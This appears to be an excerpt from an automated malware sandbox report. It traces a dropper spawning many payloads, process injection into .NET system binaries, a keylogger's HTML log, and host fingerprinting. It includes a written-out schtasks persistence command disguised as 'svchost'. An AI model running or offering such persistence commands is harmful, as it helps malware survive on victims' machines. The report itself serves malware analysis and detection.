                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 48A000
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeProcess created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe "C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000202001\hello.exe "C:\Users\user\AppData\Local\Temp\1000202001\hello.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe "C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe "C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe "C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000241001\see.exe "C:\Users\user\AppData\Local\Temp\1000241001\see.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe "C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe "C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe "C:\Users\user\AppData\Roaming\VP2pdCInvS.exe" Jump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6472 -ip 6472Jump to behavior
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 284Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exeProcess created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exeProcess created: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe "C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exe"
                                Source: C:\Users\user\AppData\Local\Temp\110000000011111\espartu.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /SC MINUTE /MO 1 /TN "svchost" /tr "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" /rl HIGHEST /f
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe "C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe"
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe
                                Source: axplong.exe, axplong.exe, 00000003.00000002.2077599379.0000000000BAF000.00000040.00000001.01000000.00000007.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4135928351.00000000013FF000.00000040.00000001.01000000.0000001F.sdmp, svchost.exe, 0000002A.00000002.4552683302.0000000005A69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000003084000.00000004.00000800.00020000.00000000.sdmp, see.exe, 0000001C.00000002.3876408152.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002F47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005A69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-]q
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qW<p class="h"><br><br>[<b>Program Manager - 05:11 UTC</b>]</p><br><p class="h">[Win]</p>LR]q
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on Saturday, 13 July 2024 05:23 UTC<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 05:11 UTC</b>]</p><br><p class="h">[Win]</p>Te]q
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005C27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qA<p class="h"><br><br>[<b>Program Manager - 05:11 UTC</b>]</p><br>LR]q
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005C27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `,]q1><br>[<b>Program Manager - 05:11 UTC</b>]</p><br>
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />Log created on Saturday, 13 July 2024 05:23 UTC<br><br><style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 05:11 UTC</b>]</p><br><p class="h">[Win]</p>
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005DBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: `,]q|<style>.h { color: 0000ff; display: inline; }</style><p class="h"><br><br>[<b>Program Manager - 05:11 UTC</b>]</p><br><p cla
                                Source: Z73fDV6g4L.exe, 00000009.00000002.2110715381.0000000003084000.00000004.00000800.00020000.00000000.sdmp, see.exe, 0000001C.00000002.3876408152.0000000002911000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000025.00000002.4024278753.0000000002F47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009DD2E8 cpuid 2_2_009DD2E8
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: GetLocaleInfoW,4_2_00AC2986
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00AC2AAF
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: EnumSystemLocalesW,4_2_00AB8A86
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: GetLocaleInfoW,4_2_00AC2BB5
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00AC2320
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00AC2C84
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: EnumSystemLocalesW,4_2_00AC25C2
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: GetLocaleInfoW,4_2_00AC251B
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: EnumSystemLocalesW,4_2_00AC26A8
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: EnumSystemLocalesW,4_2_00AC260D
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: GetLocaleInfoW,4_2_00AB8FEC
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00AC2733
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_0041E825
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,5_2_00414138
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,5_2_0041EA78
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0041EBA1
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,5_2_0041E412
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,5_2_0041ECA7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_0041ED76
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,5_2_0041465E
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,5_2_0041E60D
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,5_2_0041E6FF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,5_2_0041E6B4
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,5_2_0041E79A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000192001\gold543.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000193001\wev233v22.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000202001\hello.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000202001\hello.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000219001\1qWbf4Bsej2u.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000219001\1qWbf4Bsej2u.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000226001\Freshbuild.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000227001\see.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000238001\ovrflw.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000241001\see.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000243001\ZharkBOT.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeQueries volume information: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000202001\hello.exe VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000055001\1.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000055001\1.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000241001\see.exe VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeQueries volume information: unknown VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeCode function: 2_2_009DCAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,2_2_009DCAED
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                                Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                                Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
